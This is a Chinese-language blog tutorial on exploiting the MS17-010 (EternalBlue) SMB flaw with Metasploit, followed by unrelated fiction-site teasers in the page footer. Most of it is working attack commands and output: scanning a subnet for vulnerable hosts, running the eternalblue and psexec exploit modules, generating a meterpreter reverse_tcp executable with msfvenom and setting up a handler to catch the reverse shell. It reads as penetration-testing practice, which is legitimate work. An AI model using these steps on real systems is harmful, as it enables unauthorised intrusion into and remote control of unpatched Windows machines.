Metasploit-ms17-010 永恒之蓝 | 2019-03-29

Metasploit-ms17-010 永恒之蓝

永恒之蓝是去年玩剩下的了,记得当初刚刚泄露的时候,用的是 NSA 那个 fb.py 脚本去复现漏洞的。现在 Metasploit 里面已经集成了 17-010 漏洞,渗透测试更加方便与正式化,内网中用 17-010 去测一测会发现意外惊喜哦。

起初在 Docker 环境下最后执行 exploit 的时候总是拿不到 sessions,换了很多系统失败了很多次。后来果断感觉是 Docker 环境的问题,于是用虚拟机下的 Kali 测试,最后测试成功~~~ ~~ 所以测试的时候尽量少用 Docker 环境下的 Kali 来监听反弹的 sessions 哦~~ 后来给幸安哥描述了这个情况,得到答复是 docker 做这个反弹 shell 监听得把 445 端口映射出来才可以~~ 涨姿势了。关于端口映射后面会单独写文章来介绍,关于 msf 一些高级用法本打算写在这篇文章里面的,后来发现有的冗余了,准备另开文章来写。

Metasploit 正题

搜索相关的漏洞插件

msf > search 17-010


搜索到了 4 个相关的插件:

  1. auxiliary/admin/smb/ms17_010_command
  2. auxiliary/scanner/smb/smb_ms17_010
  3. exploit/windows/smb/ms17_010_eternalblue
  4. exploit/windows/smb/ms17_010_psexec

其中前 2 个插件是auxiliary目录下的,属于辅助验证程序。
3 和 4 是exploit目录下的,这才是我们重点研究的对象~

使用辅助验证插件测试

这里就拿auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试,这个插件的作用是扫描可能含有 ms17-010 漏洞的服务器。

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_ARCH  true             yes       Check for architecture on vulnerable hosts
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

这里的show options是显示这个插件相关的一些参数,在Required这一栏下面是yes的表示必填参数,这里面还剩RHOSTS这个参数没有填写即目标网段。下面设置一个目标网段,准备进行扫描测试:

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.55.1/24
RHOSTS => 10.10.55.1/24

设置扫描线程,插件默认是1,这里设置为50

msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50

可以执行show options查看自己刚刚填写的参数信息:


开始执行插件:

msf auxiliary(scanner/smb/smb_ms17_010) > run

或者

msf auxiliary(scanner/smb/smb_ms17_010) > exploit

可以看到扫描出很多含有漏洞的主机了:

使用 exploit 模块来进行攻击测试

exploit/windows/smb/ms17_010_eternalblue

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > run

exploit 成功~~

exploit/windows/smb/ms17_010_psexec

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.55.174
RHOST => 10.10.55.174

msf exploit(windows/smb/ms17_010_psexec) > run

失败~~

msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.101.177.185:4444
[*] 10.10.55.174:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.10.55.174:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

黑客组织 Shadow Brokers 公布了美国国家安全局 NSA 的内部黑客工具和漏洞利用代码,包括三大工具 EternalChampion、EternalRomance 和 EternalSynergy,近日一位安全研究人员 Sean Dillon(RiskSense) 改良了这三大黑客工具的源代码,使其适用于 Windows 2000 之后 20 年间的所有微软操作系统,包括 32 位和 64 位版本。

这里我随便测试了没有成功,可能是这里我测试的 win7 版本有点不一样,和官方介绍的所有版本略微有点不一样~~ 不过在测试Server 08 R2版本的时候执行效率很高,可以很快拿到反弹的 shell。所以具体改良了哪些建议实际动手去测试一番。

msf 简单反弹 shell 模板

kali 操作机器的 ip 地址是:10.101.177.185,将 shell 会话转到 kali 的6666端口上。

生成 payload

payload 生成有 32 位和 64 位,所以生成的时候得明确目标系统的位数,否则运行或者拿到会话的时候回 GG, 服务器那边弹出停止响应的运行框。

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.101.177.185 LPORT=6666 -f exe > shell.exe


然后把生成的 shell.exe 拷贝到 Windows 下面,准备运行~

32 位 payload 的生成语句就是windows/meterpreter/reverse_tcp去掉x64

监听 shell 会话

msf > use exploit/multi/handler
msf > set LHOST 10.0.0.103
msf > set LPORT 6666
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

[*] Started reverse TCP handler on 10.101.177.185:6666

然后 msf 就开始监听本机的 666 的端口了。

运行 shell.exe

这个时候在 windows 下点击之前生成的shell.exe,msf 这里会劫持到会话。

32 位系统,这里做如下调整:set PAYLOAD windows/meterpreter/reverse_tcp去掉x64

meterpreter 汉字乱码问题

成因

Linux 下面汉字默认是 UTF-8 编码
Windows 下汉字使用的是 GBK 系列编码

解决方案

Kali 下先勾选GBK编码


然后将终端临时设置为 GBK 系列编码即可。
image

效果对比

msf 乱码

msf 汉字正常

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,294评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,493评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,790评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,595评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,718评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,906评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,053评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,797评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,250评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,570评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,711评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,388评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,018评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,796评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,023评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,461评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,595评论 2 350

推荐阅读更多精彩内容

  • 期待已久啦吧,msf的首战! 你可能觉得这篇文章很短, 但、明明可以一句话搞定的任务, 我们就没不必要演的眼花缭乱...
    RabbitMask阅读 2,880评论 0 6
  • Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击(也通常用于...
    Echo_Dream阅读 14,328评论 0 1
  • MS17-010是微软在2017年发现的第十个漏洞,俗称‘永恒之蓝’,主要针对win7系统。为此,建议大家升级系统...
    1f28dd1475ee阅读 5,178评论 0 8
  • 一 漏洞及漏洞发掘方法 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统...
    kaitoulee阅读 15,182评论 0 30
  • 有一股暖流,悄悄来临,鼓励着我前进;有一股暖流,悄悄来临,滋润着我的心灵;有一股暖流,悄悄来临,温暖着...
    钟离雪瞳阅读 2,911评论 2 2